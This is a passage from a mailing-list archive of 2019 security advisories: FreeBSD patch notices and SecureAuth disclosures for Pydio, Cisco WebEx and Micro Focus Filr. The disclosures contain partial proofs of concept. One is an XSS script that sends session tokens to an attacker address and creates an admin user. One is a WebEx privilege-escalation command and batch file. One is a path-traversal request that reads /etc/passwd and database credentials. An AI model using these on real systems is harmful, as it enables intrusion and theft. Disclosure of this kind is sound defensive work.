following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://www.synacktiv.com/posts/systems/icmp-reachable.html>

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIjXA/9FevC+Ygihzb0J9MN0znEM883dk5sPCSvMwiivsNRkDMXreYqPXU+Fkt0
iV1OZ8tKwKAihm+iGJ5mzS5l40wWF1oDcqJrC0myICdvreraoJKZvTLhgGIBqKkE
b8yIuzPueWdnnudoAzTV38RhyaP2aOb44OMUNPQZsEB/6hHsNvp9m6yAua/F+x9+
N9J38Y/C6udsNfhqDeuCI4G8yiN33XfFiRbF+31rt3s0rUm6KGNsJanJe8dNAEvE
DN4tA4+MORnQ7QTLgOobGuLFhWJ2urC6psH8duO72hcSTzSkTZpxrC3f6SW8RlZ+
Pbr4LZ6FA3bZp/sCmWPOot94hotBDr03MZwrxURokeDHZU1nUBsw0rmTG4aypujl
JrGPOAp89TtqrR0zV8DhpGO/RWoBeMDf7ZGvIplOIEF5rijQWEyC5pnYlBKPfSdm
UTxcN9RoJCfz7O4KLAAqhHiuu6xc+CqlQH1dvyLbqGVv9LzUQlziTNsbQ4cGryuj
g1TztU0VfpvHDkAKBh0iHwkoUqDSut3K19rFAQ3zkM/EodqSTkE1OG77pmsjYaVq
AfcnN/se8lklq0lKi3BwNvVIWTjhMAwY63otVxvVD4wrJrgQH8NKgOeYuGBreXeW
Uv569bIhR0/vsyGJK/SMKxBiAGfzkE7LqDMJqdXLsompX97nOwI=
=m3as
-END PGP SIGNATURE-


FreeBSD Security Advisory FreeBSD-SA-19:03.wpa

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:03.wpa                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in hostapd and wpa_supplicant

Category:       contrib
Module:         wpa
Announced:      2019-05-14
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE)
                2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE)
                2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497,
                CVE-2019-9498, CVE-2019-9499, CVE-2019-11555

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

Wi-Fi Protected Access II (WPA2) is a security protocol developed by the
Wi-Fi Alliance to secure wireless computer networks.

hostapd(8) and wpa_supplicant(8) are user space daemons for access points and
wireless clients, respectively, that implement the WPA2 protocol.

II.  Problem Description

Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8)
implementations.  For more details, please see the reference URLs in the
References section below.

III. Impact

Security of the wireless network may be compromised.  For more details,
please see the reference URLS in the References section below.

IV.  Workaround

No workaround is available, but systems not using hostapd(8) or
wpa_supplicant(8) are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterwards, restart hostapd(8) or wpa_supplicant(8).

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart hostapd(8) or wpa_supplicant(8).

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc
# gpg --verify wpa-12.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc
# gpg --verify wpa-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r346980
releng/12.0/                                                      r347587
stable/11/                                                        r346981
releng/11.2/                                                      r347588
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://w1.fi/security/2019-1>
<https://w1.fi/security/2019-2>
<https://w1.fi/security/2019-3>
<https://w1.fi/security/2019-4>
<https://w1.fi/security/2019-5>

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555>

The latest revision of this advis

FreeBSD Security Advisory FreeBSD-SA-19:04.ntp

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:04.ntp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Authenticated denial of service in ntpd

Category:       contrib
Module:         ntp
Announced:      2019-05-14
Credits:        Magnus Stubman
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-8936

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The ntpd(8) daemon is an implementation of the Network Time Protocol
(NTP) used to synchronize the time of a computer system to a reference
time source.  The ntpd(8) daemon uses a protocol called mode 6 to both get
status information from the running ntpd(8) daemon and configure it on the
fly.  This protocol is typically used by the ntpq(8) program, among others.

II.  Problem Description

A crafted malicious authenticated mode 6 packet from a permitted network
address can trigger a NULL pointer dereference.

Note for this attack to work, the sending system must be on an address from
which the target ntpd(8) accepts mode 6 packets, and must use a private key
that is specifically listed as being used for mode 6 authorization.

III. Impact

The ntpd daemon can crash due to the NULL pointer dereference, causing a
denial of service.

IV.  Workaround

Use 'restrict noquery' in the ntpd configuration to limit addresses that
can send mode 6 queries.
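
Whether 'restrict noquery' actually closes the door depends on how ntpd resolves overlapping restrict lines: the most specific matching restriction wins, so a permissive 'restrict default' is only safe if every other network that should not talk to the daemon carries noquery too. The following is an added example, not code from the FreeBSD advisory or from ntpd: a small evaluator for restrict lines that answers, for a given source address, whether it may send mode 6 queries. The two configurations and the addresses are constructed.

```python
"""Added example (not ntpd's code): evaluate ntp.conf `restrict` lines to
find which sources may still send mode 6 queries."""
import ipaddress


def parse_restrict(conf_text):
    """Return [(network, flags)] for each `restrict` line.  Handles
    `restrict [-4|-6] default ...`, `restrict <addr> ...` and
    `restrict <addr> mask <mask> ...`; other directives and forms this
    example does not model (e.g. `restrict source`) are skipped."""
    rules = []
    for raw in conf_text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) < 2 or parts[0] != "restrict":
            continue
        parts = parts[1:]
        family = None
        if parts[0] in ("-4", "-6"):
            family = parts.pop(0)
        target = parts.pop(0)
        try:
            if target == "default":
                nets = []
                if family != "-6":
                    nets.append(ipaddress.ip_network("0.0.0.0/0"))
                if family != "-4":
                    nets.append(ipaddress.ip_network("::/0"))
            elif parts[:1] == ["mask"]:
                # ntpd writes masks in address form; count set bits for a prefix
                prefix = bin(int(ipaddress.ip_address(parts[1]))).count("1")
                nets = [ipaddress.ip_network(f"{target}/{prefix}", strict=False)]
                parts = parts[2:]
            else:
                nets = [ipaddress.ip_network(target)]      # a single host
        except ValueError:
            continue
        flags = frozenset(parts)
        rules.extend((net, flags) for net in nets)
    return rules


def mode6_allowed(rules, source):
    """True if `source` may send mode 6 queries.  The longest-prefix match
    among the rules is the one ntpd applies; `noquery` or `ignore` on that
    rule denies the query.  With no matching rule ntpd answers anyone."""
    src = ipaddress.ip_address(source)
    best = None
    for net, flags in rules:
        if src.version == net.version and src in net:
            if best is None or net.prefixlen > best[0].prefixlen:
                best = (net, flags)
    if best is None:
        return True
    return not ({"noquery", "ignore"} & best[1])


# Constructed configurations: the first leaves mode 6 open to the world,
# the second applies the advisory's workaround and re-opens only localhost
# and one management network.
WEAK_CONF = """
restrict default nomodify notrap
restrict 127.0.0.1
"""
HARDENED_CONF = """
restrict default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict ::1
restrict 192.0.2.0 mask 255.255.255.0 nomodify notrap
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        rules = parse_restrict(conf)
        for src in ("198.51.100.7", "192.0.2.44", "127.0.0.1", "2001:db8::1"):
            print(f"{name:8} {src:14} mode 6 allowed: {mode6_allowed(rules, src)}")
```

The network-level restriction is the gate this advisory's workaround relies on; the attack additionally needs a key listed for mode 6 authorization, so auditing the controlkey and keys file alongside the restrict lines gives the full picture of who can reach the vulnerable code path.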

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, restart the ntpd service:
# service ntpd restart

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc
# gpg --verify ntp.patch.asc

[FreeBSD 11.2-RELEASE/11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc
# gpg --verify ntp-11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the ntpd service, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r344884
releng/12.0/                                                      r347589
stable/11/                                                        r344884
releng/11.2/                                                      r347590
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele>

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTrdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLGtw/8CNAYnLxARrMUK1QeC9sE7EaboYInSOgaunf

[SAUTH-2019-0002] - Pydio 8 Multiple Vulnerabilities

2019-03-28 Thread SecureAuth Advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Pydio 8 Multiple Vulnerabilities

1. *Advisory Information*

Title: Pydio 8 Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0002
Advisory URL:
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities
Date published: 2019-03-28
Date of last update: 2019-03-28
Vendors contacted: Pydio
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Argument Injection or Modification [CWE-88], Argument Injection
or Modification [CWE-88], Information Exposure [CWE-200], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],
Information Exposure [CWE-200]
Impact: Code execution, Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,
CVE-2019-10046, CVE-2019-10046

3. *Vulnerability Description*
Pydio [1] website states that:
...Pydio, an open source EFSS (Enterprise File Synchronization and
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud
environment. Pydio is available either through a Community distribution
(Ideal for home use) that is free forever or an Enterprise which
provides all the features, support and compliance to secure file sharing.
Pydio is sold in more than 25 countries, from Cupertino to Singapore,
and is used by leading brands around the world, such as Nikon, Credit
Agricole, Dexia... Pydio also serves education and government clients,
with major references such as Cambridge University (UK) and ADEME
(France).

Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2). By
tricking an administrator into opening a shared URL bookmark through the
application, an attacker with regular user access can obtain the victim's
session identifiers, impersonate him/her, and perform actions such as
creating a new administrator user account. After gaining privileged access
to the application the attacker can leverage another vulnerability to
perform OS command injection under the privileges of the user account
running the web server.

4. *Vulnerable Packages*

. Pydio 8.2.2 - Latest version at the time of testing.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Pydio published v8.2.3 that fixes all the reported vulnerabilities.

6. *Credits*

These vulnerabilities were discovered and researched by Ramiro Molina
from SecureAuth Security Consulting Services. The publication of this
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege escalation vector based on multiple vulnerabilities*

[CVE-2019-10049]
By chaining vulnerabilities it is possible for an attacker with regular
user access to the web application to trick an administrator user into
opening a link shared through the application. The link opens a shared
file that contains JavaScript code, which is executed in the context of
the victim user to obtain sensitive information such as session
identifiers (session cookie and secure token) and to perform actions on
his/her behalf.

Note: if the targeted users are not administrators, any other action on
behalf of those users could also be achieved, for example to obtain
sensitive files stored in their accounts or to impersonate them.

Attack vector steps:

1. Authenticated in the web application with a regular user account, go
to "My Files" and upload a file named, for example, pydio_xss.html (use
the .html extension) with the following content. Once executed, the PoC
performs several requests to:

. Obtain a "secure_token" for the user, which is a CSRF prevention token.
. Obtain the session cookie for the current user.
. Send the two sensitive tokens to the attacker, this allows to
impersonate the victim user.
. Change the "context to configuration".
. Create a new user account named "admin99" with password "password1".
. Change the user role of the created user to administrator.

Note: change the IP address and port number (the example ones are the
IP 192.168.56.1 and port ).

PoC pydio_xss.html file:

/-



console.log("Starting...");
var req0 = new XMLHttpRequest();
req0.open('GET', "/welcome/", true);
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
req0.send();
req0.onload  = function() {
var res =  req0.responseText.match(/SECURE_TOKEN.*?,/)[0];
var secure_token = res.split(/"/)[2] ;
var req1 = new XMLHttpRequest();
  req1.open('POST', "index.php", true);
  req1.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
  req1.send("get_action=get_sess_id&secure_token=" + secure_token);
  req1.onlo

[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

2019-02-28 Thread advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

1. *Advisory Information*

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
Advisory ID: CORE-2018-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings.
With Cisco Webex Meetings, joining is a breeze, audio and video are
clear, and screen sharing is
easier than ever. We help you forget about the technology, to focus on
what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow
a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Cisco Webex Meetings Desktop App v33.6.4.15
. Cisco Webex Meetings Desktop App v33.6.5.2
. Cisco Webex Meetings Desktop App v33.7.0.694
. Cisco Webex Meetings Desktop App v33.7.1.15
. Cisco Webex Meetings Desktop App v33.7.2.24
. Cisco Webex Meetings Desktop App v33.7.3.7
. Cisco Webex Meetings Desktop App v33.8.0.779
. Cisco Webex Meetings Desktop App v33.8.1.13
. Cisco Webex Meetings Desktop App v33.8.2.7
. Older versions are probably affected too, but they were
  not checked.

5. *Vendor Information, Solutions and Workarounds*

Cisco informed that the vulnerability is fixed in Cisco Webex Meetings
Desktop App releases 33.6.6 and 33.9.1.

In addition, Cisco published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.
   
7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation*

[CVE-2019-1674]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate version numbers of new files. An unprivileged
local attacker could exploit this vulnerability by invoking the update
service command with a crafted argument and folder. This will allow the
attacker to run arbitrary commands with SYSTEM user privileges.
   
The vulnerability can be exploited by copying the atgpcdec.dll binary to a
local attacker-controlled folder and renaming it atgpcdec.7z. Then, a
previous version of the ptUpdate.exe file must be compressed as 7z and
copied to the controlled folder. Also, a malicious DLL named
vcruntime140.dll, compressed as vcruntime140.7z, must be placed in the
same folder. Finally, a ptUpdate.xml file must be provided in the
controlled folder so that the update binary (ptUpdate.exe) treats these
files as a normal update. To gain privileges, the attacker must start the
service with the command line:
sc start webexservice WebexService 1 989898 "attacker-controlled-path"
   
Proof of Concept:

The following proof of concept performs a 2 step attack, since starting
from version 33.8.X, the application enforces signature checking for all
the downloaded binaries. This 2 step attack works against all the
mentioned vulnerable packages. Notice that you'll need the previous
versions of the ptUpdate.exe executable. Those versions are:
3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last
step. To exploit versions prior to 33.8.X, only one step is required
(the last step in this PoC).

Batch file:
/-
@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the atta

[SAUTH-2019-0001] - Micro Focus Filr Multiple Vulnerabilities

2019-02-20 Thread advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Micro Focus Filr Multiple Vulnerabilities

1. *Advisory Information*

Title: Micro Focus Filr Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0001
Advisory URL:
https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
Date published: 2019-02-20
Date of last update: 2019-02-20
Vendors contacted: Micro Focus
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Permissions, Privileges, and Access
Control [CWE-264]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-3474, CVE-2019-3475

3. *Vulnerability Description*

Novell (now part of Micro Focus [1]) website states that:
Micro Focus Filr [2] provides file access and sharing, and lets users
access their home directories and network folders from desktops, mobile
devices, and the Web. Users can also synchronize their files to their PC
or Mac. Changes that they make to downloaded copies are kept in sync
with the originals on their network file servers. And finally, users can
also share files internally and externally, and those with the share can
collaborate with each other by commenting on the files.

A vulnerability was found in the Micro Focus Filr Appliance, which would
allow an attacker with regular user access to read arbitrary files of
the filesystem. Furthermore, a vulnerability in the famtd daemon could
allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Micro Focus Filr 3.4.0.217.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Micro Focus released Filr 3.0 Security Update 6 that addresses the
reported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~

Also, Micro Focus published the following Security Notes:

. https://support.microfocus.com/kb/doc.php?id=7023726
. https://support.microfocus.com/kb/doc.php?id=7023727

6. *Credits*

These vulnerabilities were discovered and researched by Matias Choren
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Path Traversal*

[CVE-2019-3474]
The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable
to Path Traversal attacks. An authenticated, low-privileged user may be
able to abuse this functionality in order to read arbitrary files on the
filesystem.

Proof of Concept:


1. As an authenticated user, upload a sample PDF file in the 'My Files'
section.
2. After the upload finishes, click on the small arrow next to the file
-> 'View Details'.
3. The browser will issue a few requests to the web application, one of
them being the one used for displaying the thumbnail of the file we've
just uploaded. This request has the following structure:

/-
GET
/ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=t154758084657912375035546628304890001.jpg
-/

4. If the 'viewType' parameter is set to 'image', as in this case, we
can escape the current directory and include arbitrary files, as long as
they are readable by the 'wwwrun' user (the user Apache Tomcat is
currently running as). For example, we could read the '/etc/passwd' file:

/-
GET
/ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 10.2.45.32:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531
Connection: close
-/

/-
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=Edge
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Type: image/jpeg
Date: Mon, 21 Jan 2019 14:53:37 GMT
Connection: close
Server: Filr
Content-Length: 1506

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash

<...>
-/

5. Also, an interesting file to look for would be
'/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of
different configuration files, including 'mysql-liquibase.properties'
which, among other things, defines connection parameters such as the
username and password (base64 encoded) for the MySQL database:

/-
referencePassword==?UTF-8?B?Zmlscg==?=
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
url=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
password==?UTF-8?B?Zmlscg==?=
driver=com.mysql.jdbc.Driver
referenceUsername=filr
referenceDriver=com.mysql.jdbc.Driver
username=filr
-/
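As an added illustration that is not part of the advisory or of the Filr code base, the following Python shows the check the viewFile handler is missing: percent-decode the user-supplied 'filename', canonicalize it against a fixed base directory and refuse anything that resolves outside it, plus a small helper for flagging such requests during access-log review. The base directory and the function names are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical directory the thumbnail handler is meant to serve from; the
# advisory does not name the real one.
THUMBNAIL_ROOT = "/var/filr/thumbnails"


def resolve_thumbnail(filename: str, root: str = THUMBNAIL_ROOT) -> Optional[str]:
    """Map a user-supplied 'filename' value to a path inside root.

    Returns the absolute path when it stays inside root, otherwise None.
    The value is percent-decoded once first so that an encoded '../' is
    judged on what the filesystem would actually see.
    """
    root = root.rstrip("/")
    decoded = unquote(filename)
    # NUL bytes truncate C-level paths; absolute paths would bypass the join.
    if not decoded or "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # The separator is part of the prefix test so that a sibling directory
    # such as '/var/filr/thumbnails2' cannot pass.
    if not candidate.startswith(root + "/"):
        return None
    return candidate


def looks_like_traversal(filename: str) -> bool:
    """Detection helper for log review: True when the decoded value contains
    a parent-directory component or starts at the filesystem root."""
    decoded = unquote(filename)
    parts = decoded.replace("\\", "/").split("/")
    return decoded.startswith("/") or ".." in parts


if __name__ == "__main__":
    # Constructed values mirroring the advisory's proof of concept.
    for value in (
        "t154758084657912375035546628304890001.jpg",
        "../../../../../../../../../../../etc/passwd",
        "..%2F..%2Fetc%2Fpasswd",
    ):
        print(f"{value!r}: resolved={resolve_thumbnail(value)} "
              f"flagged={looks_like_traversal(value)}")
```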

7.2. *Local Privilege Escalation*

[CVE-2019-3475]
As per the description: 'novell-famtd provide CIFS & NCP file access
sup

FreeBSD Security Advisory FreeBSD-SA-19:02.fd

2019-02-05 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:02.fd Security Advisory
  The FreeBSD Project

Topic:  File description reference count leak

Category:   core
Module: unix
Announced:  2019-02-05
Credits:Peter Holm
Affects:FreeBSD 12.0
Corrected:  2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name:   CVE-2019-5596

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.

II.  Problem Description

FreeBSD 12.0 attempts to handle the case where the receiving process does
not provide a sufficiently large buffer for an incoming control message
containing rights.  In particular, to avoid leaking the corresponding
descriptors into the receiving process' descriptor table, the kernel handles
the truncation case by closing descriptors referenced by the discarded
message.

The code which performs this operation failed to release a reference obtained
on the file corresponding to a received right.  This bug can be used to cause
the reference counter to wrap around and free the file structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from
a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc
# gpg --verify fd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path      Revision
-------------------------
stable/12/       r343785
releng/12.0/     r343790
stable/11/       r343786
-------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596>

